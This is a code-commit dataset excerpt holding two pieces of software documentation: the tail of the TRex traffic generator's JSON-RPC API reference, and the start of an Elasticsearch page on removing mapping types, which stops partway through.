this:\n[source,bash]\n----\ntrex-core\/linux> .\/b configure\ntrex-core\/linux> .\/b --target=mock-rpc-server-64-debug\n----\n\n==== Running The Mock Server\nLaunching the mock server is performed like this:\n\n[source,bash]\n----\n \ntrex-core\/scripts> .\/mock-rpc-server-64-debug\n\n-= Starting RPC Server Mock =-\n\nListening on tcp:\/\/localhost:5050 [ZMQ]\n\nSetting Server To Full Verbose\n\nServer Started\n\n----\n\n==== Using The TRex Console To Interact\nWhen the mock server is up, you can already send commands to the server.\n{zwsp} +\n{zwsp} +\n\nLet's demonstrate the operation with the Python based TRex console:\n\n{zwsp} +\n\n[source,bash]\n----\ntrex-core\/scripts> .\/trex-console\n\nConnecting To RPC Server On tcp:\/\/localhost:5050\n[SUCCESS]\n\n\n-=TRex Console V1.0=-\n\nType 'help' or '?' for supported actions\n\nTRex >\n\n----\nAs we will see later on, a basic RPC command supported by the server is 'ping'.\n{zwsp} +\nLet's issue a ping command to the server and see what happens on both sides:\n\n{zwsp} +\n{zwsp} +\n\nOn the 'client' side:\n\n[source,bash]\n----\nTRex > verbose on\n\nverbose set to on\n\nTRex > ping\n\n-> Pinging RPC server\n[verbose] Sending Request To Server:\n\n{\n \"id\": \"l0tog11a\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"ping\",\n \"params\": {}\n}\n\n[verbose] Server Response:\n\n{\n \"id\": \"l0tog11a\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n[SUCCESS]\n\n----\nOn the 'server' side:\n\n[source,bash]\n----\n\ntrex-core\/scripts> .\/mock-rpc-server-64-debug\n\n-= Starting RPC Server Mock =-\n\nListening on tcp:\/\/localhost:5050 [ZMQ]\n\nSetting Server To Full Verbose\n\nServer Started\n\n\n[verbose][req resp] Server Received:\n\n{\n \"id\" : \"maa5a3g1\",\n \"jsonrpc\" : \"2.0\",\n \"method\" : \"ping\",\n \"params\" : {}\n}\n\n[verbose][req resp] Server Replied:\n\n{\n \"id\" : \"maa5a3g1\",\n \"jsonrpc\" : \"2.0\",\n \"result\" : \"ACK\"\n}\n\n----\n\n== RPC Server State Machine\nThe RPC server can be in numbered of states, each state provides other subset of the commands\nthat are allowed to be executed.\n\nWe define the following possible states:\n\n* *unowned* - The server is either unowned or another user is owning the device\n* *owned* - The server has been acquired by the client\n* *active* - The server is in the middle of injecting traffic - currently active\n\nEach command will specify on which states it is possible to execute it.\n\nFor commands valid only on 'owned' or 'active', a field called ''handler'' 'MUST' be passed\nalong with the rest of the parameters.\n\n\nThis will identify the connection.\n\nimage::images\/rpc_states.png[title=\"RPC Server States\",align=\"left\",width=200, link=\"images\/rpc_states.png\"]\n\n== RPC Commands\nThe following RPC commands are supported\n\n=== Ping\n* *Name* - 'ping'\n* *Valid States* - 'all'\n* *Description* - Pings the TRex server\n* *Paramters* - None\n* *Result* - \"ACK\" On Sucess\n\nExample:\n\n[source,bash]\n----\n'Request':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"ping\",\n \"params\": null\n}\n\n'Response':\n\n{\n \"jsonrpc\" : \"2.0\",\n \"id\" : 1,\n \"result\" : \"ACK\"\n}\n\n----\n\n=== Get Registered Commands\n* *Name* - 'get_reg_cmds'\n* *Valid States* - 'all'\n* *Description* - Queries the server for all the registered commands\n* *Paramters* - None\n* *Result* - A list of all the supported commands by the server\n\nExample:\n\n[source,bash]\n----\n'Request':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"get_reg_cmds\",\n \"params\": null\n}\n\n\n'Response':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"result\": [\n \"remove_all_streams\",\n \"remove_stream\",\n \"add_stream\",\n \"get_reg_cmds\",\n \"ping\",\n \"test_sub\",\n \"get_version\",\n \"test_add\"\n ]\n}\n\n----\n\n\n=== Get Version\n* *Name* - 'get_version'\n* *Valid States* - 'all'\n* *Description* - Queries the server for version information\n* *Paramters* - None\n* *Result* - See table below\n\n.Object type 'return values for get_version' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| version | string | TRex version\n| build_date | string | build date\n| build_time | string | build time\n| built_by | string | who built this version\n|=================\n\n=== Get System Info\n* *Name* - 'get_system_info'\n* *Description* - Queries the server for system properties\n* *Paramters* - None\n* *Result* - See table below\n\n.return value: 'get_system_info'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| dp_core_count | int | DP core count\n| core_type | string | DP core type\n| hostname | string | machine host name\n| ip | string | machine IP\n| uptime | string | uptime of the server\n| port_count | int | number of ports on the machine\n| ports | array | arary of object ''port'' - see below\n|=================\n\n.return value: 'get_system_info'.'port'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| driver | string | driver type\n| speed | string | speed of the port (1g, 10g, 40g, 100g)\n| status | string | up \/ down\n|=================\n\n\n=== Get Owner\n* *Name* - 'get_owner'\n* *Valid States* - 'all'\n* *Description* - Queries the server for current owner\n* *Paramters* - None\n* *Result* ['string'] - owner name if exists, otherwise 'none'\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"hxjkuwj9\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_owner\",\n \"params\": null\n}\n\n'Response':\n\n{\n \"id\": \"hxjkuwj9\",\n \"jsonrpc\": \"2.0\",\n \"result\": {\n \"owner\": \"itay\"\n }\n}\n\n----\n\n=== Acquire\n* *Name* - 'Acquire'\n* *Valid States* - 'all'\n* *Description* - Takes ownership on the device.\n* *Paramters* -\n** *user* ['string'] - User name aquiring the system\n** *force* ['boolean'] - force action even if another user is holding the device\n* *Result* ['string'] - 'unique' identifier for future requests\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"b1tr56yz\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"Acquire\",\n \"params\": {\n \"force\": false,\n \"user\": \"itay\"\n }\n}\n\n\n'Response':\n\n{\n \"id\": \"b1tr56yz\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"4cBWDxS2\"\n}\n----\n\n\n=== Release\n* *Name* - 'release'\n* *Valid States* - 'owned'\n* *Description* - Release owernship over the device\n* *Paramters* -\n** *handler* ['string'] - unique identifier for the message\n* *Result* ['string'] - \"ACK\" on success\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"m785dxwd\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"release\",\n \"params\": {\n \"handler\": \"37JncCHr\"\n }\n}\n\n\n'Response':\n\n{\n \"id\": \"m785dxwd\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n----\n\n\n=== Add Stream\n* *Name* - 'add_stream'\n* *Valid States* - 'owned'\n* *Description* - Adds a stream to a port\n* *Paramters* \n** *port_id* - port id associated with this stream\n** *stream_id* - stream id associated with the stream object\n** *stream* - object of type xref:stream_obj['stream']\n* *Result* - ACK in case of success\n\n==== Object type 'stream' anchor:stream_obj[]\n\nAdd_stream gets a single parameter of type object.\n\nThe format of that object is as follows:\n\n.Object type 'stream' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| enabled | boolean | is this stream enabled\n| self_start | boolean | is this stream triggered by starting injection or triggered by another stream\n| isg | double | ['usec'] inter stream gap - delay time in usec until the stream is started\n| next_stream | int | next stream to start after this stream. -1 means stop after this stream\n| packet | object | object of type xref:packet_obj['packet']\n| mode | object | object of type xref:mode_obj['mode']\n| vm | array | array of objects of type xref:vm_obj['vm']\n| rx_stats | object | object of type xref:rx_stats_obj['rx_stats']\n|=================\n\n===== Object type 'packet' anchor:packet_obj[]\npacket contains binary and meta data\n\n.Object type 'packet'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| binary | byte array | binary dump of the packet to be used in the stream as array of bytes\n| meta | string | meta data object. opaque to the RPC server. will be passed on queries\n|=================\n\n===== Object type 'mode' anchor:mode_obj[]\nmode object can be 'one' of the following objects:\n\n.Object type 'mode - continuous' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''continuous''\n| pps | double | rate in packets per second \n|=================\n\n.Object type 'mode - single_burst' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''single_burst''\n| pps | double | rate in packets per second \n| total pkts | int | total packets in the burst\n|=================\n\n.Object type 'mode - multi_burst' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''multi_burst''\n| pps | int | rate in packets per second \n| pkts_per_burst | int | packets in a single burst\n| ibg | double | ['usec'] inter burst gap. delay between bursts in usec\n| count | int | number of bursts. ''0'' means loop forever, ''1'' will fall back to single burst\n|=================\n\n===== Object type 'vm' anchor:vm_obj[]\nArray of VM instruction objects to be used with this stream\n\nAny element in the array can be one of the following object types:\n\n.Object type 'vm - fix_checksum_ipv4'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''fix_checksum_ipv4''\n| pkt_offset | uint16 | offset of the field to fix \n|=================\n\n.Object type 'vm - flow_var'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''flow_var'''\n| name | string | flow var name - this should be a unique identifier\n| size | [1,2,4,8] | size of the flow var in bytes\n| op | ['inc', 'dec', 'random'] | operation type to perform on the field\n| init value | uint64_t as string | init value for the field\n| min value | uint64_t as string | minimum value for the field\n| max value | uint64_t as string | maximum value for the field\n|=================\n\n.Object type 'vm - write_flow_var'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''write_flow_var''\n| name | string | flow var name to write\n| pkt_offset | uint16 | offset at the packet to perform the write\n| add_value | int | delta to add to the field prior to writing - can be negative\n| is_big_endian | boolean | should write as big endian or little \n|=================\n\n\n===== Object type 'rx_stats' anchor:rx_stats_obj[]\nDescribes rx stats for the stream\n\n{zwsp} +\n\n'IMPORTANT':\n\nIn case rx_stats is enabled, meta data will be written in the end of the packet.\n\nplease consider the following:\n\n==== Constrains\n* *performance* - this will have performance impact as rx packets will be examined\n* *override* - up to 10 bytes at the end of the packet will be overidden by the meta data required\n\n==== The bytes needed for activating 'rx_stats':\n\n* *rx_stream_id* consumes 2 bytes\n* *seq_enabled* consumes 4 bytes\n* *latency_enabled* consumes 4 bytes\n\nso if no seq or latency are enabled 2 bytes will be used.\n\n\nif seq or latency alone are enabled, 6 bytes will be used.\n\n\nif both are enabled then 10 bytes will be used.\n\n\n.Object type 'rx_stats'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| enabled | boolean | is rx_stats enabled for this stream\n| seq_enabled | boolean | should write 32 bit sequence\n| latency_enabled | boolean | should write 32 bit latency\n|=================\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"add_stream\",\n \"params\": {\n \"port_id\": 1,\n\t\"stream_id\": 502\n \"stream\": {\n \"enabled\": true,\n \"isg\": 4.3,\n \"mode\": {\n \"pps\": 3,\n \"total_pkts\": 5000,\n \"type\": \"single_burst\"\n },\n \"next_stream_id\": -1,\n \"packet\": {\n \"binary\": [\n 4,\n 1,\n 255\n ],\n \"meta\": \"\"\n },\n \"rx_stats\": {\n \"enabled\": false\n },\n \"self_start\": true,\n }\n }\n}\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n\n=== Remove Stream\n* *Name* - 'remove_stream'\n* *Valid States* - 'owned'\n* *Description* - Removes a stream from a port\n* *Paramters*\n** *port_id* - port assosicated with the stream.\n** *stream_id* - stream to remove\n\n* *Result* - ACK in case of success\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1\n \"jsonrpc\": \"2.0\",\n \"method\": \"remove_stream\",\n \"params\": {\n \"port_id\": 1,\n \"stream_id\": 502\n }\n}\n\n\n'Response':\n\n{\n \"id\": 1\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n----\n\n=== Get Stream ID List\n* *Name* - 'get_stream_list'\n* *Valid States* - 'owned', 'active'\n* *Description* - fetch all the assoicated streams for a port\n* *Paramters*\n** *port_id* - port to query for registered streams\n\n* *Result* - array of 'stream_id'\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_stream_list\",\n \"params\": {\n \"port_id\": 1\n }\n}\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": [\n 502,\n 18\n ]\n}\n\n\n----\n\n=== Get Stream\n* *Name* - 'get_stream'\n* *Valid States* - 'owned', 'active'\n* *Description* - get a specific stream object\n* *Paramters*\n** *port_id* - port for the associated stream\n** *stream_id* - the requested stream id\n\n* *Result* - object xref:stream_obj['stream']\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_stream\",\n \"params\": {\n \"port_id\": 1,\n \"stream_id\": 7\n }\n}\n\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": {\n \"stream\": {\n \"enabled\": true,\n \"isg\": 4.3,\n \"mode\": {\n \"pps\": 3,\n \"type\": \"continuous\"\n },\n \"next_stream_id\": -1,\n \"packet\": {\n \"binary\": [\n 4,\n 1,\n 255\n ],\n \"meta\": \"\"\n },\n \"self_start\": true\n }\n }\n}\n\n----\n\n\n=== Remove All Streams\n* *Name* - 'remove_all_streams'\n* *Valid States* - 'owned'\n* *Description* - remove all streams from a port\n* *Paramters*\n** *port_id* - port for the associated stream\n\n* *Result* - \"ACK\" on success\n\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"remove_all_streams\",\n \"params\": {\n \"port_id\": 2\n }\n}\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n\n=== Start Traffic\n* *Name* - 'start_traffic'\n* *Valid States* - 'owned'\n* *Description* - Starts the traffic on a specific port. if traffic has already started an error will be returned\n* *Paramters*\n** *port_id* - port for starting the traffic, -1 for starting all the ports\n\n* *Result* - \"ACK\" on success\n\n[source,bash]\n----\n\n'Request':\n\n{ \n \"id\": \"b3llt8hs\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"start_traffic\",\n \"params\": {\n \"port_id\": 3\n }\n\n'Response':\n\n{\n \"id\": \"b3llt8hs\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n=== Stop Traffic\n* *Name* - 'stop_traffic'\n* *Valid States* - 'active'\n* *Description* - Stops the traffic on a specific port. if the port has already started nothing will happen\n* *Paramters*\n** *port_id* - port for stopping the traffic, -1 for stopping all the ports\n\n* *Result* - \"ACK\" on success\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"h2fyhni7\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"stop_traffic\",\n \"params\": {\n \"port_id\": 3\n }\n}\n\n'Response':\n\n{\n \"id\": \"h2fyhni7\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89d65808854906977b2c4128ff1dc96bc4cbfb1f","subject":"Update headline of the \"removal of types\" doc page to match changes in 7.0. (#40868)","message":"Update headline of the \"removal of types\" doc page to match changes in 7.0. (#40868)\n\nCurrently it describes what broke in 6.0.\r\n","repos":"scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/mapping\/removal_of_types.asciidoc","new_file":"docs\/reference\/mapping\/removal_of_types.asciidoc","new_contents":"[[removal-of-types]]\n== Removal of mapping types\n\nIMPORTANT: Indices created in Elasticsearch 7.0.0 or later no longer accept a\n`_default_` mapping. Indices created in 6.x will continue to function as before\nin Elasticsearch 6.x. Types are deprecated in APIs in 7.0, with breaking changes\nto the index creation, put mapping, get mapping, put template, get template and\nget field mappings APIs.\n\n[float]\n=== What are mapping types?\n\nSince the first release of Elasticsearch, each document has been stored in a\nsingle index and assigned a single mapping type. A mapping type was used to\nrepresent the type of document or entity being indexed, for instance a\n`twitter` index might have a `user` type and a `tweet` type.\n\nEach mapping type could have its own fields, so the `user` type might have a\n`full_name` field, a `user_name` field, and an `email` field, while the\n`tweet` type could have a `content` field, a `tweeted_at` field and, like the\n`user` type, a `user_name` field.\n\nEach document had a `_type` meta-field containing the type name, and searches\ncould be limited to one or more types by specifying the type name(s) in the\nURL:\n\n[source,js]\n----\nGET twitter\/user,tweet\/_search\n{\n \"query\": {\n \"match\": {\n \"user_name\": \"kimchy\"\n }\n }\n}\n----\n\/\/ NOTCONSOLE\n\nThe `_type` field was combined with the document's `_id` to generate a `_uid`\nfield, so documents of different types with the same `_id` could exist in a\nsingle index.\n\nMapping types were also used to establish a\n<<mapping-parent-field,parent-child relationship>>\nbetween documents, so documents of type `question` could be parents to\ndocuments of type `answer`.\n\n[float]\n=== Why are mapping types being removed?\n\nInitially, we spoke about an ``index'' being similar to a ``database'' in an\nSQL database, and a ``type'' being equivalent to a\n``table''.\n\nThis was a bad analogy that led to incorrect assumptions. In an SQL database,\ntables are independent of each other. The columns in one table have no\nbearing on columns with the same name in another table. This is not the case\nfor fields in a mapping type.\n\nIn an Elasticsearch index, fields that have the same name in different mapping\ntypes are backed by the same Lucene field internally. In other words, using\nthe example above, the `user_name` field in the `user` type is stored in\nexactly the same field as the `user_name` field in the `tweet` type, and both\n`user_name` fields must have the same mapping (definition) in both types.\n\nThis can lead to frustration when, for example, you want `deleted` to be a\n`date` field in one type and a `boolean` field in another type in the same\nindex.\n\nOn top of that, storing different entities that have few or no fields in\ncommon in the same index leads to sparse data and interferes with Lucene's\nability to compress documents efficiently.\n\nFor these reasons, we have decided to remove the concept of mapping types from\nElasticsearch.\n\n[float]\n=== Alternatives to mapping types\n\n[float]\n==== Index per document type\n\nThe first alternative is to have an index per document type. Instead of\nstoring tweets and users in a single `twitter` index, you could store tweets\nin the `tweets` index and users in the `user` index. Indices are completely\nindependent of each other and so there will be no conflict of field types\nbetween indices.\n\nThis approach has two benefits:\n\n* Data is more likely to be dense and so benefit from compression techniques\n used in Lucene.\n\n* The term statistics used for scoring in full text search are more likely to\n be accurate because all documents in the same index represent a single\n entity.\n\nEach index can be sized appropriately for the number of documents it will\ncontain: you can use a smaller number of primary shards for `users` and a\nlarger number of primary shards for `tweets`.\n\n[float]\n==== Custom type field\n\nOf course, there is a limit to how many primary shards can exist in a cluster\nso you may not want to waste an entire shard for a collection of only a few\nthousand documents. In this case, you can implement your own custom `type`\nfield which will work in a similar way to the old `_type`.\n\nLet's take the `user`\/`tweet` example above. Originally, the workflow would\nhave looked something like this:\n\n[source,js]\n----\nPUT twitter\n{\n \"mappings\": {\n \"user\": {\n \"properties\": {\n \"name\": { \"type\": \"text\" },\n \"user_name\": { \"type\": \"keyword\" },\n \"email\": { \"type\": \"keyword\" }\n }\n },\n \"tweet\": {\n \"properties\": {\n \"content\": { \"type\": \"text\" },\n \"user_name\": { \"type\": \"keyword\" },\n \"tweeted_at\": { \"type\": \"date\" }\n }\n }\n }\n}\n\nPUT twitter\/user\/kimchy\n{\n \"name\": \"Shay Banon\",\n \"user_name\": \"kimchy\",\n \"email\": \"shay@kimchy.com\"\n}\n\nPUT twitter\/tweet\/1\n{\n \"user_name\": \"kimchy\",\n \"tweeted_at\": \"2017-10-24T09:00:00Z\",\n \"content\": \"Types are going away\"\n}\n\nGET twitter\/tweet\/_search\n{\n \"query\": {\n \"match\": {\n \"user_name\": \"kimchy\"\n }\n }\n}\n----\n\/\/ NOTCONSOLE\n\nYou can achieve the same thing by adding a custom `type` field as follows:\n\n[source,js]\n----\nPUT twitter\n{\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"type\": { \"type\": \"keyword\" }, <1>\n \"name\": { \"type\": \"text\" },\n \"user_name\": { \"type\": \"keyword\" },\n \"email\": { \"type\": \"keyword\" },\n \"content\": { \"type\": \"text\" },\n \"tweeted_at\": { \"type\": \"date\" }\n }\n }\n }\n}\n\nPUT twitter\/_doc\/user-kimchy\n{\n \"type\": \"user\", <1>\n \"name\": \"Shay Banon\",\n \"user_name\": \"kimchy\",\n \"email\": \"shay@kimchy.com\"\n}\n\nPUT twitter\/_doc\/tweet-1\n{\n \"type\": \"tweet\", <1>\n \"user_name\": \"kimchy\",\n \"tweeted_at\": \"2017-10-24T09:00:00Z\",\n \"content\": \"Types are going away\"\n}\n\nGET twitter\/_search\n{\n \"query\": {\n \"bool\": {\n \"must\": {\n \"match\": {\n \"user_name\": \"kimchy\"\n }\n },\n \"filter\": {\n \"match\": {\n \"type\": \"tweet\" <1>\n }\n }\n }\n }\n}\n----\n\/\/ NOTCONSOLE\n<1> The explicit `type` field takes the place of the implicit `_type` field.\n\n[float]\n==== Parent\/Child without mapping types\n\nPreviously, a parent-child relationship was represented by making one mapping\ntype the parent, and one or more other mapping types the children. Without\ntypes, we can no longer use this syntax. The parent-child feature will\ncontinue to function as before, except that the way of expressing the\nrelationship between documents has been changed to use the new\n<<parent-join,`join` field>>.\n\n\n[float]\n=== Schedule for removal of mapping types\n\nThis is a big change for our users, so we have tried to make it as painless as\npossible. The change will roll out as follows:\n\nElasticsearch 5.6.0::\n\n* Setting `index.mapping.single_type: true` on an index will enable the\n single-type-per-index behaviour which will be enforced in 6.0.\n\n* The <<parent-join,`join` field>> replacement for parent-child is available\n on indices created in 5.6.\n\nElasticsearch 6.x::\n\n* Indices created in 5.x will continue to function in 6.x as they did in 5.x.\n\n* Indices created in 6.x only allow a single-type per index. Any name\n can be used for the type, but there can be only one. The preferred type name\n is `_doc`, so that index APIs have the same path as they will have in 7.0:\n `PUT {index}\/_doc\/{id}` and `POST {index}\/_doc`\n\n* The `_type` name can no longer be combined with the `_id` to form the `_uid`\n field. The `_uid` field has become an alias for the `_id` field.\n\n* New indices no longer support the old-style of parent\/child and should\n use the <<parent-join,`join` field>> instead.\n\n* The `_default_` mapping type is deprecated.\n\n* In 6.7, the index creation, index template, and mapping APIs support a query\n string parameter (`include_type_name`) which indicates whether requests and\n responses should include a type name. It defaults to `true`, and should be set\n to an explicit value to prepare to upgrade to 7.0. Not setting `include_type_name`\n will result in a deprecation warning. Indices which don't have an explicit type will\n use the dummy type name `_doc`.\n\nElasticsearch 7.x::\n\n* Specifying types in requests is deprecated. For instance, indexing a\n document no longer requires a document `type`. The new index APIs\n are `PUT {index}\/_doc\/{id}` in case of explicit ids and `POST {index}\/_doc`\n for auto-generated ids.\n\n* The `include_type_name` parameter in the index creation, index template,\n and mapping APIs will default to `false`. Setting the parameter at all will\n result in a deprecation warning.\n\n* The `_default_` mapping type is removed.\n\nElasticsearch 8.x::\n\n* Specifying types in requests is no longer supported.\n\n* The `include_type_name` parameter is removed.\n\n[float]\n=== Migrating multi-type indices to single-type\n\nThe <<docs-reindex,Reindex API>> can be used to convert multi-type indices to\nsingle-type indices. The following examples can be used in Elasticsearch 5.6\nor Elasticsearch 6.x. In 6.x, there is no need to specify\n`index.mapping.single_type` as that is the default.\n\n[float]\n==== Index per document type\n\nThis first example splits our `twitter` index into a `tweets` index and a\n`users` index:\n\n[source,js]\n----\nPUT users\n{\n \"settings\": {\n \"index.mapping.single_type\": true\n },\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"name\": {\n \"type\": \"text\"\n },\n \"user_name\": {\n \"type\": \"keyword\"\n },\n \"email\": {\n \"type\": \"keyword\"\n }\n }\n }\n }\n}\n\nPUT tweets\n{\n \"settings\": {\n \"index.mapping.single_type\": true\n },\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"content\": {\n \"type\": \"text\"\n },\n \"user_name\": {\n \"type\": \"keyword\"\n },\n \"tweeted_at\": {\n \"type\": \"date\"\n }\n }\n }\n }\n}\n\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"type\": \"user\"\n },\n \"dest\": {\n \"index\": \"users\"\n }\n}\n\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"type\": \"tweet\"\n },\n \"dest\": {\n \"index\": \"tweets\"\n }\n}\n----\n\/\/ NOTCONSOLE\n\n[float]\n==== Custom type field\n\nThis next example adds a custom `type` field and sets it to the value of the\noriginal `_type`. It also adds the type to the `_id` in case there are any\ndocuments of different types which have conflicting IDs:\n\n[source,js]\n----\nPUT new_twitter\n{\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"type\": {\n \"type\": \"keyword\"\n },\n \"name\": {\n \"type\": \"text\"\n },\n \"user_name\": {\n \"type\": \"keyword\"\n },\n \"email\": {\n \"type\": \"keyword\"\n },\n \"content\": {\n \"type\": \"text\"\n },\n \"tweeted_at\": {\n \"type\": \"date\"\n }\n }\n }\n }\n}\n\n\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n },\n \"script\": {\n \"source\": \"\"\"\n ctx._source.type = ctx._type;\n ctx._id = ctx._type + '-' + ctx._id;\n ctx._type = '_doc';\n \"\"\"\n }\n}\n----\n\/\/ NOTCONSOLE\n\n[float]\n=== Typeless APIs in 7.0\n\nIn Elasticsearch 7.0, each API will support typeless requests,\nand specifying a type will produce a deprecation warning.\n\nNOTE: Typeless APIs work even if the target index contains a custom type.\nFor example, if an index has the the custom type name `my_type`, we can add\ndocuments to it using typeless `index` calls, and load documents with typeless\n`get` calls.\n\n[float]\n==== Indices APIs\n\nIndex creation, index template, and mapping APIs support a new `include_type_name`\nURL parameter that specifies whether mapping definitions in requests and responses\nshould contain the type name. The parameter defaults to `true` in version 6.7 to\nmatch the pre-7.0 behavior of using type names in mappings. It defaults to `false`\nin version 7.0 and will be removed in version 8.0.\n\nIt should be set explicitly in 6.7 to prepare to upgrade to 7.0. To avoid deprecation\nwarnings in 6.7, the parameter can be set to either `true` or `false`. In 7.0, setting\n`include_type_name` at all will result in a deprecation warning.\n\nSee some examples of interactions with Elasticsearch with this option set to `false`:\n\n[source,js]\n--------------------------------------------------\nPUT index?include_type_name=false\n{\n \"mappings\": {\n \"properties\": { <1>\n \"foo\": {\n \"type\": \"keyword\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n<1> Mappings are included directly under the `mappings` key, without a type name.\n\n[source,js]\n--------------------------------------------------\nPUT index\/_mappings?include_type_name=false\n{\n \"properties\": { <1>\n \"bar\": {\n \"type\": \"text\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n<1> Mappings are included directly under the `mappings` key, without a type name.\n\n[source,js]\n--------------------------------------------------\nGET index\/_mappings?include_type_name=false\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe above call returns\n\n[source,js]\n--------------------------------------------------\n{\n \"index\": {\n \"mappings\": {\n \"properties\": { <1>\n \"foo\": {\n \"type\": \"keyword\"\n },\n \"bar\": {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n<1> Mappings are included directly under the `mappings` key, without a type name.\n\n[float]\n==== Document APIs\n\nIn 7.0, index APIs must be called with the `{index}\/_doc` path for automatic\ngeneration of the `_id` and `{index}\/_doc\/{id}` with explicit ids.\n\n[source,js]\n--------------------------------------------------\nPUT index\/_doc\/1\n{\n \"foo\": \"baz\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[source,js]\n--------------------------------------------------\n{\n \"_index\": \"index\",\n \"_id\": \"1\",\n \"_type\": \"_doc\",\n \"_version\": 1,\n \"result\": \"created\",\n \"_shards\": {\n \"total\": 2,\n \"successful\": 1,\n \"failed\": 0\n },\n \"_seq_no\": 0,\n \"_primary_term\": 1\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\nSimilarly, the `get` and `delete` APIs use the path `{index}\/_doc\/{id}`:\n\n[source,js]\n--------------------------------------------------\nGET index\/_doc\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nFor API paths that contain both a type and endpoint name like `_update`,\nin 7.0 the endpoint will immediately follow the index name:\n\n[source,js]\n--------------------------------------------------\nPOST index\/_update\/1\n{\n \"doc\" : {\n \"foo\" : \"qux\"\n }\n}\n\nGET \/index\/_source\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nTypes should also no longer appear in the body of 